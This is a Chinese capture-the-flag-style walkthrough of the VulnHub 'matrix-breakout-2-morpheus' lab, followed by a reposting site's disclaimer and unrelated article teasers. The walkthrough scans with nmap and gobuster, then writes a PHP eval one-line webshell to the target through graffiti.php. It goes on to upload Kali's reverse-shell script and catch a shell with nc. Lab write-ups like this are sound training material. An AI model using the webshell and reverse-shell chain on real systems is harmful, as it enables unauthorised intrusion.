matrix-breakout-2-morpheus 靶機----練習攻略 【僅獲取shell】

【此練習僅做到反彈shell】

1.靶機下載地址

https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

2. 打開靶機,kali使用nmap掃描同C段的主機? 找到靶機ip

確保靶機和kali網卡均為NAT模式

先查看kali的ip

nmap 192.168.182.1/24? ? ? ?排除物理機、網關、kali等,可得出靶機ip為? 192.168.182.162、

以及開啟端口:22 ssh、80 http 、81? hosts2-ns

3.? 直接通過ip訪問頁面? ?發現無法ssh,以及關鍵詞Trinity

4.? kali的dirb掃描敏感目錄

發現 /robots.txt文件、

以及js腳本文件:?/javascript/jquery? ? ? ? 、? /javascript/jquery/jquery

5. 訪問多個目錄的網址

ip/robots.txt? 無任何信息

?/javascript/jquery? 無權限訪問

/javascript/jquery/jquery? ? ? 頁面源代碼

無有效結果,換其他方式掃描目錄

6.? 使用gobuster再次掃描

輸入:gobuster dir -u http://192.168.182.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

注意:

發現無gobuster ,kali使用apt命令進行安裝:apt install gobuster。

如果無法找到軟件包,請先更新apt命令:apt update。

再安裝gobuster即可。

安裝完成,再次執行開始的那條命令。

掃描結果,發現 /robots.txt? ?、 /graffiti.txt? ?、? ?/graffiti.php? 三個可用 文件

7.對 /graffiti.txt? ?、? ?/graffiti.php 進行訪問

在 graffiti.php 頁面發現輸入框

8.在輸入框輸入123456,點擊Post,發現頁面顯示出該內容

9. 嘗試輸入一句話木馬

輸入:<?php @eval($_POST[cmd]);?>

抓包,發現將數據提交到?graffiti.txt文件中

將message值改為一句話木馬,目標文件改為shell.php文件。發行,關閉攔截。

10. 訪問shell.php文件,蟻劍進行連接

11. 找到kali自帶的反彈shell文件,復制內容到物理機保存為1.php

kali:

cd /usr/share/webshells/

cd php

cat php-reverse-shell.php

12. 修改ip和端口

13. 將 1.php文件通過蟻劍上傳到靶機中

14.kali的nc監聽6654端口,瀏覽器訪問上傳的1.php,反彈shell

監聽返回了shell,輸入whoami驗證,成功。

此練習僅做到反彈shell。

練習結束,反彈shell可通過kali的自帶反彈shell文件,上傳文件并訪問獲取shell。

對大家能有些許幫助最好,沒有的話請見諒。

再見。。。

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?----------------2025/3/19? 21:52

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/73822.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/73822.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/73822.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Flutter中Align的使用說明

又失業了&#xff0c;作為一個高齡Android程序員今年找工作真難呀。現在Flutter是必需技能了&#xff0c;所以最近在自學。所用書籍叫《Flutter實戰》&#xff0c;如下 如今已看了100多頁&#xff0c;發現這本書寫得……有點趕吧&#xff0c;好幾處講得不清不楚&#xff0c;而關…

java八股文之常見的集合

一、數組的索引為什么從0開始&#xff1f; 尋址公式&#xff1a; 數組的首地址索引乘以存儲數據的類型大小 在根據數組索引獲取元素的時候&#xff0c;會用索引和尋址公式來計算內存所對應的元素數據。如果數組的索引從1開始&#xff0c;尋址公式中&#xff0c;就需要增加一次…

用ASCII字符轉化圖片

代碼 from PIL import Image# 定義 ASCII 字符集&#xff0c;從最暗到最亮 ASCII_CHARS "%#*-:. "def resize_image(image, new_width100):width, height image.sizeratio height / widthnew_height int(new_width * ratio)resized_image image.resize((new_wi…

詳解Sympy:符號計算利器

Sympy是一個專注于符號數學計算的數學工具&#xff0c;使得用戶可以輕松地進行復雜的符號運算&#xff0c;如求解方程、求導數、積分、級數展開、矩陣運算等。其中比較流行的深度學習框架pytorch的用到了Sympy,主要用于將模型的計算圖轉換為符號化表達式&#xff0c;以便進行分…

高頻SQL 50 題(持續更新)

SQL的編寫與運用 0. 寫在前面 最近學習了數據庫系統概論&#xff0c;其中涉及到了關于SQL語句的編寫&#xff0c;感覺理論知識不足以讓我掌握相關的編寫方式&#xff0c;因此選擇刷力扣上的題目進行復習鞏固。 時間不是很多&#xff0c;可能不會經常更新&#xff0c;有時間寫…

【Python】12、函數-02

文章目錄 1. 返回值2.文檔字符串3. 作用域4. 命名空間 1. 返回值 返回值就是函數執行以后返回的結果&#xff0c;可以通過return來指定函數的返回值。返回值可以通過變量接收返回值 return 后可以返回任意的對象&#xff0c;甚至是一個函數如果僅寫一個return或者不寫return&…

Unity插件-適用于畫面傳輸的FMETP STREAM使用方法(三)基礎使用

目錄 一、插件介紹 二、組件介紹 三、Game View Streaming 1、使用 FM Network UDP 的基本設置 Server Scene Client Scene 2、使用使用 FM WebSocket 的基本設置 四、Audio Streaming 五、Microphone Streaming 一、插件介紹 ??????Unity插件-適用于畫面傳輸的…

如何為預訓練模型進行領域適配:全參數微調、LoRA 還是 Prompt Tuning?

目錄 如何為預訓練模型進行領域適配&#xff1a;全參數微調、LoRA 還是 Prompt Tuning&#xff1f; 1. 全參數微調&#xff08;Full Fine-tuning&#xff09; 適用場景 優缺點 示例代碼&#xff08;使用 Hugging Face Transformers 進行全參數微調&#xff09; 2. LoRA&am…

C++ —— 線程同步(互斥鎖)

C —— 線程同步&#xff08;互斥鎖&#xff09; 線程同步互斥鎖&#xff08;互斥量&#xff09;測試代碼mutex互斥鎖 線程同步 線程同步&#xff1a;多線程協同工作&#xff0c;協商如何使用共享資源。 C11線程同步包含三部分內容&#xff1a; 互斥鎖&#xff08;互斥量&…

UI設計中的加載動畫:優化用戶體驗的細節

hello寶子們...我們是艾斯視覺擅長ui設計和前端數字孿生、大數據、三維建模、三維動畫10年經驗!希望我的分享能幫助到您!如需幫助可以評論關注私信我們一起探討!致敬感謝感恩! 在數字產品泛濫的今天&#xff0c;用戶對體驗的要求早已超越功能本身。一個看似簡單的加載動畫&…

SpringBoot3+Vue3實戰(Vue3快速開發登錄注冊頁面并對接后端接口)(4)

目錄 一、SpringBoot3Vue3實現基本增刪改查。前后端通信交互、配置后端跨域請求。數據批量刪除。(博客鏈接) 二、SpringBoot3Vue3快速開發登錄、注冊頁面并實現對接。 &#xff08;1&#xff09;操作數據表employee(員工信息表)。 <1>修改employee表的字段組成。 <2&g…

Python標準庫中bisect模塊的bisect_right()函數在網格交易中的應用

本文將深入探討Python標準庫中bisect模塊的bisect_right()函數在網格交易中的具體應用。 bisect模塊 bisect模塊是Python標準庫中的一個模塊&#xff0c;提供了對有序列表的插入和搜索操作的支持。它基于二分查找算法&#xff0c;可以高效地在有序列表中查找或插入元素&#x…

Excel(函數篇):IF函數、FREQUNCY函數、截取函數、文本處理函數、日期函數、常用函數詳解

目錄 IF函數等于判斷區間判斷與AND函數、OR函數一同使用IFNA函數和IFERROR函數 FREQUNCY函數、分斷統計LEFT、RIGHT、MID截取函數FIND函數、LEN函數SUBSTITUTE函數ASC函數、WIDECHAR函數實戰&#xff1a;如何獲取到表中所有工作簿名稱文本處理函數TEXT函數TEXTJOIN函數 日期函數…

生成PDF文件:從html2canvas和jsPdf渲染到Puppeteer矢量圖

剛剛實現而已&#xff1a;第一次明白&#xff0c;雙擊或file:///打開html文件&#xff0c;居然和從localhost:3000打開同一個html文件有本質的區別。 字體居然還能以Base64代碼嵌入到網頁&#xff0c;只是太大太笨。 需要安裝node.js&#xff0c;npm安裝更多依賴&#xff1a;…

Git 分支刪除操作指南(含本地與遠程)

&#x1f680; Git 分支刪除操作指南&#xff08;含本地與遠程&#xff09; 在多人協作的開發過程中&#xff0c;定期清理已合并的臨時分支&#xff08;如 feature/*、bugfix/*、hotfix/* 等&#xff09;可以保持倉庫整潔&#xff0c;避免混亂。 &#x1f4cc; 分支命名規范回…

Qt中打開windows的cmd窗口并顯示

在windows上&#xff0c;用Qt的GUI程序打開另一個程序&#xff0c;使用QProcess即可&#xff0c;并且被打開的程序通常也會顯示出來&#xff0c;但是如果想要打開dos窗口并顯示&#xff0c;并執行其中的命令或者批處理&#xff0c;則需要使用QProcess提供的windows特有的函數QP…

Modbus TCP到RTU:輕松轉換指南!

Modbus TCP 到 RTU&#xff1a;輕松轉換指南&#xff01; 在現代工業自動化領域&#xff0c;Modbus TCP和Modbus RTU兩種通信協議因其高效、穩定的特點被廣泛應用。然而&#xff0c;隨著技術的發展和設備升級的需求&#xff0c;經常會遇到需要將這兩種協議進行互相轉換的場景。…

微信小程序訂閱消息發送消息,點擊消息進入小程序頁面

1、在小程序官網訂閱消息選用或創建消息模板獲取模板ID可多個 如圖&#xff1a; 2、微信小程序前端頁面發送請求訂閱權限 請求模板id的權限可以是一個可以是多個&#xff0c;用戶同意訂閱&#xff0c;獲取code傳遞給后端——后端拿到code生成唯一的openid用于發送訂閱消息 注…

卷積神經網絡 - 卷積層

卷積神經網絡一般由卷積層、匯聚層和全連接層構成&#xff0c;本文我們來學習卷積層。 卷積層&#xff08;Convolutional Layer&#xff09;是卷積神經網絡&#xff08;CNN&#xff09;的核心組件&#xff0c;專門用于處理具有網格結構的數據&#xff08;如圖像、音頻、時間序…

Vue3全局化配置(ConfigProvider)

效果如下圖&#xff1a; 在線預覽 APIs ConfigProvider 參數說明類型默認值theme主題對象Theme{}abstractboolean是否不存在 DOM 包裹元素truetagstringConfigProvider 被渲染成的元素&#xff0c;abstract 為 true 時有效‘div’ Theme Type 名稱說明類型默認值common?全…